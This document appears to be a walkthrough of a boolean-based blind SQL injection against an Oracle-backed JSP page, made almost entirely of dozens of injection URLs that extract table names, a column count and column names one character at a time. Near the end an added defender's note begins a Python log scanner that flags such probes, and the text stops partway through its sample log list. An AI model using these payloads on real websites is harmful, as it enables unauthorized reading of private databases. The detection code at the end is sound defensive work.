www.test.net/index_kaoyan_view.jsp?id=117 And 73=ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=2)ORDER BY 1DESC)WHERE ROWNUM<=1),3,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 73>ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=2)ORDER BY 1DESC)WHERE ROWNUM<=1),3,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 70=ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=2)ORDER BY 1DESC)WHERE ROWNUM<=1),3,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 70>ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=2)ORDER BY 1DESC)WHERE ROWNUM<=1),3,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 69=ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=2)ORDER BY 1DESC)WHERE ROWNUM<=1),3,1))

Fourth character of the second table name (ADER): R

www.test.net/index_kaoyan_view.jsp?id=117 And 69=ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=2)ORDER BY 1DESC)WHERE ROWNUM<=1),4,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 95=ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=2)ORDER BY 1DESC)WHERE ROWNUM<=1),4,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 80=ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=2)ORDER BY 1DESC)WHERE ROWNUM<=1),4,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 80>ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=2)ORDER BY 1DESC)WHERE ROWNUM<=1),4,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 85=ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=2)ORDER BY 1DESC)WHERE ROWNUM<=1),4,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 85>ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=2)ORDER BY 1DESC)WHERE ROWNUM<=1),4,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 82=ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=2)ORDER BY 1DESC)WHERE ROWNUM<=1),4,1))

Length of the third table name:

www.test.net/index_kaoyan_view.jsp?id=117 And 0<=nvl(length((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=3)ORDER BY 1DESC)WHERE ROWNUM<=1)),0)

www.test.net/index_kaoyan_view.jsp?id=117 And 1>=nvl(length((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=3)ORDER BY 1DESC)WHERE ROWNUM<=1)),0)

www.test.net/index_kaoyan_view.jsp?id=117 And 2<=nvl(length((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=3)ORDER BY 1DESC)WHERE ROWNUM<=1)),0)

3. Guessing the column count and the column names:

a) Number of digits in the column count of table AD: 2 (the subquery is COUNT(*) FROM COLS WHERE TABLE_NAME='AD', written as CHR(65)||CHR(68) to avoid quotes; its length is read as a string)

www.test.net/index_kaoyan_view.jsp?id=117 And 0<=nvl(length((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68))),0)

www.test.net/index_kaoyan_view.jsp?id=117 And 1>=nvl(length((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68))),0)

www.test.net/index_kaoyan_view.jsp?id=117 And 2<=nvl(length((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68))),0)

www.test.net/index_kaoyan_view.jsp?id=117 And 4>=nvl(length((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68))),0)

www.test.net/index_kaoyan_view.jsp?id=117 And 3=nvl(length((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68))),0)

www.test.net/index_kaoyan_view.jsp?id=117 And 3>nvl(length((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68))),0)

www.test.net/index_kaoyan_view.jsp?id=117 And 2=nvl(length((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68))),0)

So table AD has a two-digit column count, i.e. at least 10 columns.

First digit of the column count: 1 (tens)

www.test.net/index_kaoyan_view.jsp?id=117 And 52=ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),1,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 52>ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),1,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 49=ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),1,1))

Second digit of the column count: 0 (ones), so table AD has 10 columns

www.test.net/index_kaoyan_view.jsp?id=117 And 49=ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 95=ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 77=ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 77>ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 70=ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 70>ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 67=ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 67>ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 65=ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 65>ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 109=ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 109>ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 102=ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 102>ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 99=ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 99>ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 97=ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 97>ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 53=ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 53>ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 51=ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 51>ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 50=ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 50>ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 48=ascii(substr((SELECT COUNT(*) FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1))

Length of the first column name of table AD (CLASS): 5

www.test.net/index_kaoyan_view.jsp?id=117 And 0<=nvl(length((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1)),0)

www.test.net/index_kaoyan_view.jsp?id=117 And 1>=nvl(length((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1)),0)

www.test.net/index_kaoyan_view.jsp?id=117 And 2<=nvl(length((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1)),0)

www.test.net/index_kaoyan_view.jsp?id=117 And 4>=nvl(length((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1)),0)

www.test.net/index_kaoyan_view.jsp?id=117 And 5<=nvl(length((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1)),0)

www.test.net/index_kaoyan_view.jsp?id=117 And 9>=nvl(length((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1)),0)

www.test.net/index_kaoyan_view.jsp?id=117 And 7=nvl(length((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1)),0)

www.test.net/index_kaoyan_view.jsp?id=117 And 7>nvl(length((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1)),0)

www.test.net/index_kaoyan_view.jsp?id=117 And 5=nvl(length((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1)),0)

First character of the first column name: C

www.test.net/index_kaoyan_view.jsp?id=117 And 65=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),1,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 95=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),1,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 78=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),1,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 78>ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),1,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 71=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),1,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 71>ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),1,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 68=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),1,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 68>ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),1,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 66=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),1,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 66>ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),1,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 67=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),1,1))

Second character of the first column name: L

www.test.net/index_kaoyan_view.jsp?id=117 And 67=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 95=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 79=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 79>ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 73=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 73>ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 76=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),2,1))

Third character of the first column name: A

www.test.net/index_kaoyan_view.jsp?id=117 And 76=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),3,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 95=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),3,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 83=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),3,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 83>ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),3,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 79=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),3,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 79>ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),3,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 77=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),3,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 77>ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),3,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 70=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),3,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 70>ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),3,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 67=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),3,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 67>ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),3,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 65=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),3,1))

Fourth character of the first column name: S

www.test.net/index_kaoyan_view.jsp?id=117 And 65=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),4,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 95=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),4,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 78=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),4,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 78>ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),4,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 84=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),4,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 84>ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),4,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 81=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),4,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 81>ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),4,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 82=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),4,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 82>ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),4,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 83=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),4,1))

Fifth character of the first column name: S (the value found at position 4 is tried first and matches)

www.test.net/index_kaoyan_view.jsp?id=117 And 83=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),5,1))

Guessing the second column name of table AD (length 7, first character H):

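The request sequence above is a boolean-based blind extraction of column names: nvl(length(...)) brackets the length of the name, then ascii(substr(...)) compares it one byte at a time, with every probe differing only in the number being compared. As an added defender-side example that is not part of the original article, the following Python script flags such probes in access-log URLs by their Oracle-specific signatures and counts the burst per (path, parameter); the host name and the sample log lines are constructed for the example.

```python
import re
from collections import Counter
from urllib.parse import parse_qsl, unquote_plus, urlsplit

# Signatures of the Oracle boolean-blind probes walked through on this page:
# nvl(length(...)) brackets the column-name length, ascii(substr(...)) compares it
# byte by byte, and ROWNUM / CHR()||CHR() / COLS scaffold the data-dictionary subquery.
BLIND_SIGNATURES = {
    "ascii_substr": re.compile(r"ascii\s*\(\s*substr\s*\(", re.I),
    "nvl_length": re.compile(r"nvl\s*\(\s*length\s*\(", re.I),
    "rownum_limit": re.compile(r"rownum\s*<=\s*\d+", re.I),
    "chr_concat": re.compile(r"chr\s*\(\s*\d+\s*\)\s*\|\|\s*chr\s*\(", re.I),
    "dictionary_view": re.compile(r"\bfrom\s*(cols|all_tab_columns|user_tab_columns)\b", re.I),
}
# A probe value carries "And <number> <comparison>": the boolean test the attacker flips.
BOOLEAN_TAIL = re.compile(r"\band\s+\d+\s*(<=|>=|=|<|>)", re.I)

def _split(url):
    return urlsplit(url if "://" in url else "http://" + url)

def classify_url(url):
    """Return (path, [matched signature names]) for one request, after URL-decoding the query."""
    parts = _split(url)
    query = unquote_plus(parts.query)
    return parts.path, [name for name, pat in BLIND_SIGNATURES.items() if pat.search(query)]

def tainted_params(url):
    """Names of the query parameters whose value carries the boolean tail."""
    pairs = parse_qsl(_split(url).query, keep_blank_values=True)
    return [name for name, value in pairs if BOOLEAN_TAIL.search(value)]

def summarize(log_urls, min_hits=2):
    """Count probes per (path, parameter). Requiring min_hits distinct signatures keeps a lone
    'rownum<=1' in a search box quiet; a burst on one parameter is the extraction signal."""
    counts = Counter()
    for url in log_urls:
        path, hits = classify_url(url)
        if len(hits) >= min_hits:
            for param in tainted_params(url) or ["<unknown>"]:
                counts[(path, param)] += 1
    return counts

# Constructed sample access-log URLs (placeholder host), modelled on the probes above.
SAMPLE_LOG = [
    "www.example.invalid/index_kaoyan_view.jsp?id=117",
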